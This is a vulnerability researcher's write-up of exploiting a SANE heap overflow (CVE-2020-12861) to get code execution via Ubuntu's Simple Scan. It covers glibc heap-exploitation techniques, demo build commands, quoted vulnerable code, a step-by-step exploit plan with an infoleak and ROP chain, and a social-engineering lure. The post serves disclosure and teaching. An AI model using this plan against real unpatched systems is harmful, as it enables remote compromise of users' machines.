I recently reported several
vunerabilities in
SANE —
an open-source library for interfacing with document scanners.
It is used by the
Simple Scan application,
which ships by default with Ubuntu Desktop.
One of the vulnerabilities,
CVE-2020-12861
(aka GHSL-2020-080),
is a remotely triggerable heap buffer overflow.
I thought it would be a great prank to play on my colleagues at the
GitHub UK office in Oxford if I could use it to pop a
calculator on their desktops.
Like me, many of my colleagues in Oxford run Ubuntu.
I doubt that many of them use Simple Scan on a regular basis,
but that’s easily solved with little bit of social engineering.
I planned to post a message like this on our internal #oxford
channel:
Have any of you managed to get Ubuntu’s scanning application to work with the printer on the 2nd floor?
My colleagues are a helpful bunch, so I bet several of them would have immediately opened Simple Scan to try it out. Mwahaha! Sadly, my plan was thwarted by COVID-19, because we are all working from home now. But it was an interesting exploitation challenge, regardless. Ultimately, I was successful, as you can see in this video. Just starting Simple Scan is sufficient to trigger the vulnerability, because SANE Backends automatically searches the local network for scanners. All I need to do is connect my laptop to the office network and run a small server that pretends to be a network-attached scanner, then wait for my colleagues to start Simple Scan.
ASLR tries to ruin the prank
Address space layout randomization (ASLR) greatly increases the difficulty of exploiting a memory corruption vulnerability. To achieve code execution, you usually need to be able to forge code and data pointers, which means that you need to know the ASLR offsets. One way to deduce the ASLR offsets is with an infoleak vulnerability. I looked hard for a remote infoleak in SANE, but the only one that I found, CVE-2020-12863 (aka GHSL-2020-083), is useless in practice because it only works when the next byte on the stack is a valid ASCII digit. And even if it did work, it would leak very little useful information. For my prank to be viable, any amount of brute force is also out of the question. If my exploit doesn’t guess the ASLR offsets correctly on the first try, then Simple Scan will crash, which is “game over” for the prank.
My only hope is a local infoleak:
CVE-2020-12862
(aka GHSL-2020-082).
The function decode_binary
has an out-of-bounds read:
/* h000 */
static char *decode_binary(char *buf)
{
char tmp[6];
int hl;
memcpy(tmp, buf, 4);
tmp[4] = '\0';
if (buf[0] != 'h')
return NULL;
hl = strtol(tmp + 1, NULL, 16);
if (hl) {
char *v = malloc(hl + 1);
memcpy(v, buf + 4, hl);
v[hl] = '\0';
return v;
}
return NULL;
}
I control the contents of buf
, so I also control the value of hl
,
which can be any value between 0 and 0xFFF (4095).
So the memcpy
can read beyond the end of buf
.
Since buf
is a stack buffer (rbuf
in
esci2_cmd
),
I can use this to copy up to 4095 bytes
of stack data into a newly allocated heap buffer.
In other words, I can use this vulnerability to copy all kinds of juicy information,
such as stack pointers, heap pointers, and code pointers, into a heap buffer.
The only problem is that all of that data is on the wrong computer.
A local infoleak can be just as good as a remote infoleak if the victim application contains a scripting engine. For example, browser exploits usually involve a malicious JavaScript program that runs in the victim’s browser. There’s no need to transmit the leaked pointers back to the attacker’s computer if you can process them on-site. SANE does not contain a scripting engine though.
Luckily, I don’t need a full scripting engine. All I really need is a single subtraction operation. I’ll explain why in more detail later, but the short reason is that the whole exploit hinges on being able to overwrite a specific stack address with a large number. The local infoleak gives me a stack pointer, which is always exactly 0x218 higher in memory than the stack address which I want to overwrite. So I need to subtract 0x218 from the pointer. If I can find a way to do that then the rest of the exploit will fall into place.
To compute the subtraction, I’ll use a variation on a classic heap exploitation technique known as the “House of Force.”
The Malloc Maleficarum
The Malloc Maleficarum is
a legendary document from 2005 about glibc heap exploitation.
It introduced a number of new exploitation techniques with names like the
“House of Lore” and the “House of Spirit.”
Almost 15 years later,
improved sanity checks in glibc’s malloc
implementation have
closed the door on several of the houses.
For example, the House of Lore is closed since glibc version 2.26.
Soon, it will also be time to say farewell to the House of Force,
which is shut down by improved sanity checking in glibc 2.28.
But the House of Force isn’t out of business yet:
Ubuntu 18.04 LTS is one of the
most widely used Linux distributions, and it ships with glibc 2.27.
A fantastic resource for learning about glibc heap exploitation is the how2heap repository, by the Shellphish team. It covers a large selection of techniques, including the Malloc Maleficarum techniques that still work. It also includes a convenient test harness for running the examples on different glibc versions. I particularly like how each technique is documented as a runnable C program, so that you can step through the code in gdb and see exactly what is happening.
I have published the complete source code for my exploit. Warning: it’s ugly, and to fully understand what it’s doing you need to simultaneously debug the exploit source code and the SANE source code. Instead, I thought it would be more useful to present the important parts of the exploit as standalone how2heap-style C programs. You can download the demos and run them yourself:
git clone https://github.com/github/securitylab
cd securitylab/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/home
make
./01_chunk_layout # run the first example
The demos are designed to work with glibc 2.27, so if your system has a different glibc version then I recommend running the demos in Docker. I have included a Dockerfile based on a Ubuntu 18.04 LTS image for this purpose:
git clone https://github.com/github/securitylab
cd securitylab/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/
sudo docker build . -t glibc-heap-exploit-demos --build-arg UID=`id -u`
sudo docker run --rm -i -t glibc-heap-exploit-demos
# We're in a container now.
make
./01_chunk_layout # run the first example
I will present these demos first, and at the end of the blog post, will explain how I combined the techniques to create a working exploit for the SANE vulnerabilities.
The demos only focus on the parts of the glibc allocator that are relevant to the exploit. If you would like to read a more general overview of how the glibc allocator works, I recommend reading Azeria’s two-part series.
Demo 1: glibc memory chunk layout
01_chunk_layout.c is a very simple demo to illustrate the “chunk” data structure used by the glibc malloc implementation. Here’s a diagram of what chunks look like in memory:1
Notice that the blocks of user data are separated by metadata blocks of size 0x10 bytes. The demo allocates four chunks, frees one of them, and then prints the metadata, which looks like this:
Chunk 0:
0x55d899c2c250: 0000000000000000 0000000000000811 (metadata)
0x55d899c2c260: 0000000000000000 0000000000000000 (user data)
0x55d899c2c270: 0000000000000000 0000000000000000 (user data)
Chunk 1:
0x55d899c2ca60: 0000000000000000 0000000000000811 (metadata)
0x55d899c2ca70: 0000000000000000 0000000000000000 (user data)
0x55d899c2ca80: 0000000000000000 0000000000000000 (user data)
Chunk 2 (free):
0x55d899c2d270: 0000000000000000 0000000000000811 (metadata)
0x55d899c2d280: 00007f4021262ca0 00007f4021262ca0 (user data)
0x55d899c2d290: 0000000000000000 0000000000000000 (user data)
Chunk 3:
0x55d899c2da80: 0000000000000810 0000000000000810 (metadata)
0x55d899c2da90: 0000000000000000 0000000000000000 (user data)
0x55d899c2daa0: 0000000000000000 0000000000000000 (user data)
The vulnerability in SANE is a heap buffer overflow, so it enables me to overwrite the next chunk in memory. There are two particularly important observations to be made about that:
- The chunk metadata contains only size information. Since it does not contain any pointers, I can exploit the metadata before I have obtained the ASLR offsets.
- The user data section is used to store metadata after the chunk has been freed. Therefore, I can only safely overwrite the user data section of the next chunk if:
- It is currently allocated, or
- I know the ASLR offsets.
In other words, a heap buffer overflow gives me a lot of power to manipulate the heap without needing to know the ASLR offsets. And once I have deduced the ASLR offsets, I can start overwriting the pointers in freed chunks and thereby gain access to other areas of memory, such as the stack.
Demo 2: arithmetic with top
The top chunk is the sentinel chunk at the top of the heap. It has metadata, but its user data section is unused. When the allocator has run out of free chunks, it allocates memory from the top chunk. This means that the top chunk shrinks and moves to a higher memory location:
The top chunk is usually moderately sized (0x10000 bytes or so). If there isn’t enough memory left in the top chunk to service an allocation then the allocator uses a system call to request more memory from the OS. The concept of the House of Force is to overwrite the size of the top chunk with a very large number, so that the allocator thinks that it can allocate a huge chunk without needing to request more memory from the OS. The how2heap repository has a nice demo of the House of Force.
I already mentioned that my exploit uses a variation on the House of Force to compute a subtraction. The idea is to overwrite the size of the top chunk with a pointer. Then, by allocating another chunk, I can subtract an offset from the pointer. 02_arithmetic_with_top.c is a simple demo of this idea. As mentioned in the demo, there is a slight issue because the least significant three bits of the chunk size contain important metadata, which causes the bottom byte of the pointer to get modified in an inconvenient way. In the exploit, I avoid this by writing the stack address one byte higher in memory, which has the effect of multiplying the number by 0x100 (because the machine is little-endian). The offset that I need to subtract from the pointer for the exploit to work is 0x218, so I actually need to allocate 0x21800 bytes to get the correct result.
Demo 3: overlapping a chunk with top
Did I just create a chicken-and-egg problem? If I am able to overwrite the size of the top chunk with a pointer, doesn’t that imply that I have already defeated ASLR? If so, what’s the point of the elaborate exercise to subtract an offset from the pointer? The answer is that I don’t use the buffer overflow directly, instead I use it indirectly to create a chunk that overlaps with the top chunk. Later, that chunk is allocated and a pointer is written into it, overwriting the size of the top chunk. Here’s a diagram illustrating the idea:
In the first part of the diagram, two chunks have been
allocated adjacent to the top chunk.
A heap buffer overflow on the first chunk overwrites
the metadata of the second, making it look bigger.
When the second chunk is freed,
it is returned with a larger size than when it was allocated.
Later, an allocation with the larger size
returns a pointer to this chunk which overlaps with the
top chunk.
In the SANE exploit, I have arranged things so that the
call to malloc
in decode_binary
(see above) returns a chunk
that overlaps with the top chunk, which is how I am able to overwrite
the size of the top chunk with a stack pointer.
The demo is 03_overlap_top_chunk.c.
Demo 4: fastbin reverse into tcache
Using the variation on the House of Force just described,
I can calculate a stack address that I want to overwrite.
The next step is to overwrite that address.
The how2heap repository contains a technique called
unsorted bin attack,
which does exactly that.
A call to malloc
causes a large value (a pointer) to be written to a stack address.
Unfortunately, I discovered that the unsorted bin attack isn’t suitable for my exploit,
because I need to trigger the write with an 0x40 byte allocation.
The unsorted bin attack only works with an 0x410 byte allocation, or larger.
Luckily, I was able to find a different technique that works for allocations up to 0x78 bytes.
I named this technique “fastbin reverse into tcache” and submitted a
pull request,
which has been merged into the how2heap repository.
I also asked in the pull request whether it was already a known technique.
Kyle Zeng, one of the maintainers of the how2heap repository,
says
it was first made public in the 2019 HITCON CTF.
The tcache and fastbins are both caches for small-sized chunks, indexed by chunk size, so that a request for a specific chunk size can be serviced very quickly. I am not entirely sure why the allocator needs two caches. The tcache was added to the codebase more recently than the fastbins and appears, in my opinion, to have made the fastbins mostly redundant. The only limitation that the tcache has, which the fastbins don’t, is that the tcache has a maximum capacity of seven chunks per size. So if you have allocated a large number of chunks, all of the same size, and then free them all in rapid succession, then the first seven chunks go into the tcache and the rest go into the fastbins.
If the tcache is empty, then the allocator tries to allocate from the fastbin instead. But, as the comment in the source code says, it doesn’t just allocate one chunk from the fastbin: it also refills the tcache. Since the tcache has a maximum capacity of seven chunks, this means that seven chunks are taken from the fastbin and moved to the tcache. Since the chunks are stored as a singly linked list, a side effect of this is that the list is reversed. The “fastbin reverse into tcache” technique uses this list reversal behavior to overwrite a value on the stack, as depicted in this diagram:
The diagram starts with an empty tcache and seven chunks
in the fastbin.
A memory corruption vulnerability has been used to overwrite
the forward pointer of the seventh chunk with a pointer to the
stack.
The stack is not a valid chunk, so its forward pointer is invalid.
The second part of the diagram shows the situation after
a chunk has been allocated.
malloc
has returned the head of the fastbin list.
The rest of the list has been reversed and moved to the tcache.
Unfortunately, the fastbin now points to the garbage
pointer that was previously on the stack.
There are two versions of the demo.
The first version,
04_A_fastbin_reverse_into_tcache.c,
demonstrates the simpler scenario in which the value on the stack is zero.
Because it looks like a NULL pointer, there is no risk of accidentally
dereferencing an invalid pointer, so there is no need for the fastbin
to contain exactly seven elements.
It also means that the technique doesn’t leave the fastbin in an invalid state.
The second version of the demo,
04_B_fastbin_reverse_into_tcache.c,
demonstrates the scenario in which there is garbage on the stack.
In this scenario, the technique leaves the fastbin in an invalid state.
Allocations that can be served from the tcache still work fine,
but any allocation that triggers a call to
malloc_consolidate
will cause a crash.
In other words: no more large allocations.
I found myself in this situation in the SANE exploit and it almost
scuppered the whole thing.
But I found a workaround, at the expense of having to trigger
a codepath containing a call to
sleep
.
It’s the reason why the exploit takes approximately 10 seconds to run.
This technique has another limitation:
malloc_consolidate
empties the fastbins.
That means that no large allocations can happen while the technique is in
progress.
Both versions of the demo contain a commented out malloc(0x410)
to
show this problem:
04_A_fastbin_reverse_into_tcache.c, line 65
and
04_B_fastbin_reverse_into_tcache.c, line 67.
Uncommenting those allocations breaks the demos.
This is an obstacle that I need to overcome in the SANE exploit,
because it means that I have to find a way to fill the fastbin
during the final step of the exploit, rather than being able
to set it up in advance.
Demo 5: shrinking a chunk while it’s in the tcache
The final demo is quite a simple technique, but I use it extensively in the SANE exploit to work around the limitation of the “fastbin reverse into tcache” technique which I just mentioned. I need a way to quickly free seven chunks so that they will be added to the fastbin. But all I have to work with is this code, which allocates some memory and then immediately frees it:
char *v = decode_string(value);
DBG(1, " version: %s\n", v);
free(v);
The good news is that I can send a command which triggers this code seven times in quick succession. The bad news is that it will keep reusing the same chunk and not add any new chunks to the fastbin. The trick is to corrupt some chunks in the tcache so that I can allocate them with one size, and then free them with a smaller size. This is simple to do with a buffer overflow that overwrites the metadata below the chunk:
I just need to make sure that the user data section of the chunk contains some fake metadata, so that it won’t trigger any run-time checks when it is freed.
The demo is 05_shrink_tcache_chunk.c.
SANE vulnerability overview and exploit plan
On startup, SANE Backends automatically searches for scanners.
It seems that every manufacturer has designed their own unique
protocol for communicating with their devices,
so SANE Backends has to iterate through all the different brands
(HP, Canon, etc.),
trying each of their protocols in turn.
The vulnerability that I am going to exploit is in the implementation of
the EPSON protocol.
The protocol starts with SANE Backends sending out a broadcast UDP message
and listening for responses, in
e2_network_discovery
:
sanei_udp_write_broadcast(fd, 3289, (unsigned char *) query, 15);
DBG(5, "%s, sent discovery packet\n", __func__);
to.tv_sec = 1;
to.tv_usec = 0;
FD_ZERO(&rfds);
FD_SET(fd, &rfds);
sanei_udp_set_nonblock(fd, SANE_TRUE);
while (select(fd + 1, &rfds, NULL, NULL, &to) > 0) {
if ((len = sanei_udp_recvfrom(fd, buf, 76, &ip)) == 76) {
DBG(5, " response from %s\n", ip);
/* minimal check, protocol unknown */
if (strncmp((char *) buf, "EPSON", 5) == 0)
attach_one_net(ip);
}
}
So the first step of the exploit is to run a server, listening on UDP port 3289, which will respond to any incoming messages. Notice that the code above is designed to handle multiple replies. That’s crucial for the exploit, because it enables me to trigger the heap overflow an unlimited number of times. When my server receives the broadcast message, it fires off 128 replies to keep this loop running for a while.
Although it is extremely convenient that I can trigger the loop in e2_network_discovery
an unlimited number of times, it also creates two hurdles.
The first hurdle is just a minor inconvenience:
an object of type struct epsonds_device
(size 0xf8 bytes) is
leaked
on every iteration.
If the top chunk is ever used to service that allocation then it will throw
the exploit into chaos,
so I need to make sure that I create lots of small gaps in the heap to absorb the leaks
during the heap grooming phase of the exploit.
The second hurdle is more serious:
on every iteration, an object of type struct epsonds_scanner
(size 0x820 bytes) is
allocated
(and also freed, thankfully).
Since that’s a large allocation, it triggers a call to malloc_consolidate
.
Therefore, if I want to use the “fastbin reverse into tcache” technique,
it has to happen within a single iteration.
After the initial UDP exchange, the protocol switches to TCP communication,
which is where the bugs are.
The TCP communication is handled by a pair of functions:
epsonds_net_write
and
epsonds_net_read
.
First, epsonds_net_write
sends a short message containing a command and an expected reply size.
It also
allocates
a heap buffer for the reply.
Then epsonds_net_read
receives the reply:
/* receive net header */
size = epsonds_net_read_raw(s, header, 12, status);
if (size != 12) {
return 0;
}
if (header[0] != 'I' || header[1] != 'S') {
DBG(1, "header mismatch: %02X %02x\n", header[0], header[1]);
*status = SANE_STATUS_IO_ERROR;
return 0;
}
// incoming payload size
size = be32atoh(&header[6]);
DBG(23, "%s: wanted = %lu, available = %lu\n", __func__,
(u_long) wanted, (u_long) size);
*status = SANE_STATUS_GOOD;
if (size == wanted) {
DBG(15, "%s: full read\n", __func__);
if (size) {
read = epsonds_net_read_raw(s, buf, size, status);
}
if (s->netbuf) {
free(s->netbuf);
s->netbuf = NULL;
s->netlen = 0;
}
if (read < 0) {
return 0;
}
} else if (wanted < size) {
DBG(23, "%s: long tail\n", __func__);
read = epsonds_net_read_raw(s, s->netbuf, size, status); <===== no bounds check
if (read != size) {
return 0;
}
memcpy(buf, s->netbuf, wanted);
read = wanted;
free(s->netbuf);
s->netbuf = NULL;
s->netlen = 0;
} else {
DBG(23, "%s: partial read\n", __func__);
read = epsonds_net_read_raw(s, s->netbuf, size, status);
if (read != size) {
return 0;
}
s->netlen = size - wanted;
s->netptr += wanted;
read = wanted;
DBG(23, "0,4 %02x %02x\n", s->netbuf[0], s->netbuf[4]);
DBG(23, "storing %lu to buffer at %p, next read at %p, %lu bytes left\n",
(u_long) size, s->netbuf, s->netptr, (u_long) s->netlen);
memcpy(buf, s->netbuf, wanted);
}
return read;
I highlighted the line of code where the heap buffer overflow is.
s->netbuf
is the heap buffer (of size wanted
) that was allocated
during epsonds_net_write
.
I control the value of size
, so I can overflow the buffer.
One of the things that I find fascinating about exploitation
is that minor bugs,
which wouldn’t normally be classified as security bugs,
can sometimes be just as important for the exploit to work
as the security bug.
In this code, the minor bug that’s almost as important as the
heap overflow is the memory leak that happens in the
final else
branch.
Notice that there is no call to free(s->netbuf)
.
My exploit uses this extensively for heap grooming.
Exploit plan
As I mentioned earlier,
I couldn’t find a usable remote infoleak in SANE.
Instead, I will use the heap buffer overflow to
manufacture one.
The function epsonds_net_write
, which I mentioned above,
sends commands to the scanner:
int
epsonds_net_write(epsonds_scanner *s, unsigned int cmd, const unsigned char *buf,
size_t buf_size, size_t reply_len, SANE_Status *status)
{
unsigned char *h1, *h2;
unsigned char *packet = malloc(12 + 8);
/* XXX check allocation failure */
h1 = packet; // packet header
h2 = packet + 12; // data header
if (reply_len) {
s->netbuf = s->netptr = malloc(reply_len);
s->netlen = reply_len;
DBG(24, "allocated %lu bytes at %p\n",
(u_long) reply_len, s->netbuf);
}
DBG(24, "%s: cmd = %04x, buf = %p, buf_size = %lu, reply_len = %lu\n",
__func__, cmd, buf, (u_long) buf_size, (u_long) reply_len);
memset(h1, 0x00, 12);
memset(h2, 0x00, 8);
h1[0] = 'I';
h1[1] = 'S';
h1[2] = cmd >> 8; // packet type
h1[3] = cmd; // data type
h1[4] = 0x00;
h1[5] = 0x0C; // data offset
DBG(24, "H1[0]: %02x %02x %02x %02x\n", h1[0], h1[1], h1[2], h1[3]);
// 0x20 passthru
// 0x21 job control
if (buf_size) {
htobe32a(&h1[6], buf_size);
}
if((cmd >> 8) == 0x20) {
htobe32a(&h1[6], buf_size + 8); // data size (data header + payload)
htobe32a(&h2[0], buf_size); // payload size
htobe32a(&h2[4], reply_len); // expected answer size
DBG(24, "H1[6]: %02x %02x %02x %02x (%lu)\n", h1[6], h1[7], h1[8], h1[9], (u_long) (buf_size + 8));
DBG(24, "H2[0]: %02x %02x %02x %02x (%lu)\n", h2[0], h2[1], h2[2], h2[3], (u_long) buf_size);
DBG(24, "H2[4]: %02x %02x %02x %02x (%lu)\n", h2[4], h2[5], h2[6], h2[7], (u_long) reply_len);
}
if ((cmd >> 8) == 0x20 && (buf_size || reply_len)) {
// send header + data header
sanei_tcp_write(s->fd, packet, 12 + 8);
} else {
sanei_tcp_write(s->fd, packet, 12);
}
// send payload
if (buf_size)
sanei_tcp_write(s->fd, buf, buf_size);
free(packet);
*status = SANE_STATUS_GOOD;
return buf_size;
}
I will overwrite the value of buf_size
so that the final
call to sanei_tcp_write
sends far more bytes than it should.
buf
is a stack pointer so this will result in a remote infoleak
containing all the information that I need to complete the exploit.
How can I overwrite buf_size
though?
It is stored in a register, so the only opportunity that I have
to alter its value is during one of the calls to malloc
at
the beginning of function, when it is temporarily saved to the stack.
That is why I need to use the “fastbin reverse into tcache” technique:
it enables me to overwrite buf_size
during that malloc
.
I use the variant of the House of Force to calculate the stack address
where buf_size
will be saved.
These are the main steps of the exploit:
- Groom the heap by deliberately leaking memory. There are three goals:
- Fill any large gaps so that any subsequent large allocations will come from the top chunk.
- Leave plenty of smaller gaps to absorb smaller memory leaks. In particular, the code is going to leak an object of type
struct epsonds_device
(size 0xf8 bytes) on every iteration. - Empty the tcache for allocations of size 0x3d0, 0x3e0, 0x3f0, and 0x400. That’s because I want to allocate blocks of those sizes from the top chunk and then store them in the tcache to use later.
- Prepare a magazine of chunks in the tcache using the “shrink a chunk while it’s in the tcache” technique. I use these chunks later in the “fastbin reverse into tcache” technique.
- Allocate and free a large chunk from the top chunk. The purpose of this is to
mmap
enough memory to ensure that the subsequent top chunk shenanigans don’t accidentally hit unmapped memory and trigger aSIGSEGV
. - Create a chunk that overlaps with the top chunk.
- Use the variant of the House of Force to calculate the stack address where
buf_size
will be saved. - Trigger “fastbin reverse into tcache”.
- Receive the stack dump and reply with a simple ROP chain.
The reason why I am able to immediately reply with a ROP chain in the final step is that the next heap allocation returns a stack pointer, due to the “fastbin reverse into tcache” technique. Therefore, I am able to send back a reply which overwrites the stack. I can do this reliably, because the stack dump has given me stack pointers, heap pointers, code pointers, and the value of the stack canary.
Farewell to the House of Force
The House of Force will be out of business soon. For example, Ubuntu 20.04 LTS ships with glibc 2.31, which includes a run-time check to block it. Does it mean that exploits like this will no longer be possible? I don’t think so. In hindsight, I could have designed the exploit to only overwrite the size of the top chunk with the bottom two bytes of the stack address, rather than the entire address, which would be a small enough number to avoid triggering the new run-time check. It would add a few more steps to the exploit because I would need to reconstruct the new address by concatenating bytes, but I think it would work.
I personally think it’s a little bit sad to see the glibc allocator — one of the most fundamental building blocks of all our software — getting gunked up with ever more run-time checks. Even if the run-time cost is very small, it’s still a price that we all pay. And it’s often futile. If an application has a bad heap corruption vulnerability, then run-time checks in the allocator are often just speed bumps on the road to exploitation. Ultimately, the only way to solve these issues is by eliminating the memory corruption vulnerabilities. Mitigations in the allocator won’t save us.
-
It’s slightly ambiguous where heap chunks begin and end, because the blocks of metadata include information about the chunks above and below. In my diagram, I have started each chunk from the beginning of the metadata, which is consistent with the alignment of the
malloc_chunk
datatype. However, it glosses over the fact that the bottom half of the metadata block really belongs with the chunk below rather than the chunk above, particularly because it is used to store user data while the chunk is allocated. Azeria, in her overview of the glibc heap implementation, has instead depicted the chunks as starting and ending in the middle of the metadata blocks. ↩